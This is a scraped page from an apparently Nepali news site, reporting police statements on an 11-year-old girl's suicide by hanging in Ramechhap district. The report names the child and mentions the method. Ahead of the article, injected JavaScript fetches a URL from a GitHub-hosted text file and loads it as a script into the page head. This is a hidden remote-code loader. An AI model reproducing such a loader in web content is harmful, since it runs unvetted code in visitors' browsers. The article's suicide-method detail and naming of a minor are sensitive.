;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सुनापतिमा ११ वर्षीय बालिकाद्वरा आत्महत्या – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सुनापतिमा ११ वर्षीय बालिकाद्वरा आत्महत्या
रामेछाप बिशेष

सुनापतिमा ११ वर्षीय बालिकाद्वरा आत्महत्या

 

भदौ २६,
रामेछाप । रामेछापकाे सुनापति गाउपालिका वडा नं ३ मा ११ वर्षीय बालिकाले झुन्डिएर आत्महत्या गरेकि छिन्। स्थानीय आरुखर्क बस्ने कान्छा तामाङको ११ वर्षीय छाेेेरी मान्सि मुक्तानले घरमा कोहि नभएको बेलामा उनकै एक तले घरको, कोठाको दलिनमा पासाे लगाएर आत्महत्या गरेकाे जिल्ला प्रहरी कार्यालय रामेछापका प्रमुख डिएसपी वसन्त पाठकले जानकारी दिए ।

सो सम्बन्धमा आवश्यक अनुसन्धान भइरहेकोे प्रहरी जानकारी दिएकाे छ ।

फेसबुक प्रतिक्रियाहरु